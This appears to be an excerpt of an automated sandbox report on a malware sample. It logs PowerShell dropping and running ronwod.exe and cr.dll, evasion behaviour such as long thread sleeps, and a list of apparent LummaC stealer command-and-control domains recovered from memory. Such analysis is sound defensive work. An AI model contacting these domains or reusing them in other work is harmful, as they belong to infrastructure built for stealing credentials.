Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B8B7C5E push eax; retf	0_2_00007FFD9B8B7C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B8B842E pushad ; ret	0_2_00007FFD9B8B845D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B8B782E pushad ; iretd	0_2_00007FFD9B8B785D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B8B845E push eax; ret	0_2_00007FFD9B8B846D
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01487929 push ebp; ret	2_2_01487889
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_014879FC push edi; retf	2_2_014879FD
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01487371 push 084301B6h; ret	2_2_0148739E
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01487D95 pushad ; iretd	2_2_01487FDD
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0147B5B0 push eax; mov dword ptr [esp], 31A531AAh	2_2_0147B5BE
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0147E6B0 push eax; mov dword ptr [esp], 352E36E1h	2_2_0147E6B3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\extract\cr.dll			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\extract\ronwod.exe			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\extract\cr.dll			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\extract\ronwod.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4310			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5558			Jump to behavior

Source: C:\ProgramData\extract\ronwod.exe

API coverage: 5.6 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe TID: 7736	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe TID: 7752	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: ronwod.exe, 00000002.00000002.1818376641.0000000001503000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: ronwod.exe, 00000002.00000002.1818460522.000000000152F000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000002.00000003.1817746988.000000000152F000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000002.00000003.1803922298.0000000001535000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000000.00000002.1822608269.0000020128F0D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZs

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\ProgramData\extract\ronwod.exe

Code function: 2_2_0147CD20 LdrInitializeThunk,

2_2_0147CD20

Source: C:\ProgramData\extract\ronwod.exe

Code function: 2_2_00A114E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00A114E0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_00A111A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	2_2_00A111A3
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_00A113C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,	2_2_00A113C9
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_00A11160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	2_2_00A11160
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_00A1116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	2_2_00A1116C

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: ronwod.exe	String found in binary or memory: scentniej.buzz
Source: ronwod.exe	String found in binary or memory: rebuildeso.buzz
Source: ronwod.exe	String found in binary or memory: screwamusresz.buzz
Source: ronwod.exe	String found in binary or memory: inherineau.buzz
Source: ronwod.exe	String found in binary or memory: cashfuzysao.buzz
Source: ronwod.exe	String found in binary or memory: appliacnesot.buzz
Source: ronwod.exe	String found in binary or memory: prisonyfork.buzz
Source: ronwod.exe	String found in binary or memory: lackadausaz.click
Source: ronwod.exe	String found in binary or memory: hummskitnj.buzz

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\ProgramData\extract\ronwod.exe "C:\ProgramData\extract\ronwod.exe"

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
